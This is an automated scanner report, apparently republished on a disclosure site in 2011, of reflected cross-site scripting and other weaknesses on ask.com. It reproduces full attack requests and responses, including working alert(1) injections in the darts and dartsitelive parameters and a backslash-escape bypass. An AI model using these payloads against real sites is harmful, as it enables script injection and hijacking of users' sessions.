XSS, DORK, Cross Site Scripting, Unforgivable Vulnerabilities, CWE-79

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 24 12:49:16 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. Cross-site scripting (reflected)

1.1. http://www.ask.com/fifdart [dartgadoutput parameter]

1.2. http://www.ask.com/fifdart [dartgadsafe parameter]

1.3. http://www.ask.com/fifdart [dartgadtype parameter]

1.4. http://www.ask.com/fifdart [dartgchannel parameter]

1.5. http://www.ask.com/fifdart [dartgclient parameter]

1.6. http://www.ask.com/fifdart [darts parameter]

1.7. http://www.ask.com/fifdart [dartsitelive parameter]

1.8. http://www.ask.com/fifdart [dartsize parameter]

1.9. http://www.ask.com/fifdart [darturi parameter]

1.10. http://www.ask.com/fifdart [q parameter]

1.11. http://www.ask.com/pictureslanding [l parameter]

1.12. http://www.ask.com/ [wz_cu cookie]

1.13. http://www.ask.com/ [wz_cu cookie]

1.14. http://www.ask.com/ [wz_cu cookie]

1.15. http://www.ask.com/ [wz_uid cookie]

1.16. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]

1.17. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]

1.18. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_sid cookie]

1.19. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_uid cookie]

1.20. http://www.ask.com/ja-ask-dialog [wz_cu cookie]

1.21. http://www.ask.com/pictures [wz_cu cookie]

1.22. http://www.ask.com/pictures [wz_cu cookie]

1.23. http://www.ask.com/pictures [wz_sid cookie]

1.24. http://www.ask.com/pictures [wz_uid cookie]

1.25. http://www.ask.com/pictureslanding [wz_cu cookie]

1.26. http://www.ask.com/pictureslanding [wz_cu cookie]

1.27. http://www.ask.com/pictureslanding [wz_sid cookie]

1.28. http://www.ask.com/pictureslanding [wz_uid cookie]

2. Cleartext submission of password

3. Password field submitted using GET method

3.1. http://www.ask.com/ja-ask-dialog

3.2. http://www.ask.com/ja-ask-dialog

4. Password field with autocomplete enabled

4.1. http://www.ask.com/ja-ask-dialog

4.2. http://www.ask.com/ja-ask-dialog

4.3. http://www.ask.com/ja-ask-dialog

5. Referer-dependent response

6. Cookie scoped to parent domain

6.1. http://www.ask.com/

6.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails

6.3. http://www.ask.com/ja-ask-dialog

6.4. http://www.ask.com/pictures

6.5. http://www.ask.com/pictureslanding

7. Cross-domain Referer leakage

7.1. http://www.ask.com/

7.2. http://www.ask.com/

7.3. http://www.ask.com/

7.4. http://www.ask.com/

7.5. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails

7.6. http://www.ask.com/ja-ask-dialog

7.7. http://www.ask.com/pictures

7.8. http://www.ask.com/pictureslanding

8. Cross-domain script include

8.1. http://www.ask.com/

8.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails

8.3. http://www.ask.com/pictures

8.4. http://www.ask.com/pictureslanding

9. Cookie without HttpOnly flag set

9.1. http://www.ask.com/

9.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails

9.3. http://www.ask.com/ja-ask-dialog

9.4. http://www.ask.com/pictures

9.5. http://www.ask.com/pictureslanding

10. Content type incorrectly stated


1. Cross-site scripting (reflected)  next
There are 28 instances of this issue:

1.1. http://www.ask.com/fifdart [dartgadoutput parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartgadoutput request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 484eb\'%3b816a68b5162 was submitted in the dartgadoutput parameter. This input was echoed as 484eb\\';816a68b5162 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js484eb\'%3b816a68b5162&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:17 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cat';
var google_ad_channel = '';
var google_hints = '';
var google_ad_output = 'js484eb\\';816a68b5162';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash';
var google_image_size = '300x250';
var google_
...[SNIP]...
1.2. http://www.ask.com/fifdart [dartgadsafe parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartgadsafe request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5650e\'%3be954f92cef7 was submitted in the dartgadsafe parameter. This input was echoed as 5650e\\';e954f92cef7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high5650e\'%3be954f92cef7&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:17 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
0';
var google_num_ads_recieved= '';
var google_language = '';
var google_country = '';
var google_encoding = 'utf8';
var google_safe = 'high5650e\\';e954f92cef7';
var google_adtest = 'off';
var google_kw = '';
var google_kw_type = 'broad';

document.write('<script type="text\/javascript" src="http://ad.doublecli
...[SNIP]...
1.3. http://www.ask.com/fifdart [dartgadtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartgadtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ede9\'%3bfbde3563d45 was submitted in the dartgadtype parameter. This input was echoed as 9ede9\\';fbde3563d45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash9ede9\'%3bfbde3563d45&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:16 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
var google_hints = '';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash9ede9\\';fbde3563d45';
var google_image_size = '300x250';
var google_num_ads_recieved= '';
var google_language = '';
var google_country = '';
var google_encoding
...[SNIP]...
1.4. http://www.ask.com/fifdart [dartgchannel parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartgchannel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20b58\'%3bb90d53e5b88 was submitted in the dartgchannel parameter. This input was echoed as 20b58\\';b90d53e5b88 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=20b58\'%3bb90d53e5b88&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cat';
var google_ad_channel = '20b58\\';b90d53e5b88';
var google_hints = '';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,fl
...[SNIP]...
1.5. http://www.ask.com/fifdart [dartgclient parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartgclient request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3f7c\'%3b5cfb58d0629 was submitted in the dartgclient parameter. This input was echoed as e3f7c\\';5cfb58d0629 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cate3f7c\'%3b5cfb58d0629&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5427


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cate3f7c\\';5cfb58d0629';
var google_ad_channel = '';
var google_hints = '';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';

...[SNIP]...
1.6. http://www.ask.com/fifdart [darts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the darts request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81bb7'%3balert(1)//3de897a564 was submitted in the darts parameter. This input was echoed as 81bb7';alert(1)//3de897a564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as81bb7'%3balert(1)//3de897a564&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5434


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text\/javascript" src="http://ad.doubleclick.net/adj/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as81bb7';alert(1)//3de897a564;hhi=159;test=0;ord=1300982826477?">
...[SNIP]...
1.7. http://www.ask.com/fifdart [dartsitelive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartsitelive request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc81f'%3balert(1)//6ea5ef1e2e2 was submitted in the dartsitelive parameter. This input was echoed as cc81f';alert(1)//6ea5ef1e2e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dircc81f'%3balert(1)//6ea5ef1e2e2&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5435


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text\/javascript" src="http://ad.doubleclick.net/adj/5480.iac.usa.ask.hp.x.x.dircc81f';alert(1)//6ea5ef1e2e2/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1300982823459?">
...[SNIP]...
1.8. http://www.ask.com/fifdart [dartsize parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the dartsize request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d20fe\'%3ba9177b1e6f6 was submitted in the dartsize parameter. This input was echoed as d20fe\\';a9177b1e6f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250d20fe\'%3ba9177b1e6f6&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash';
var google_image_size = '300x250d20fe\\';a9177b1e6f6';
var google_num_ads_recieved= '';
var google_language = '';
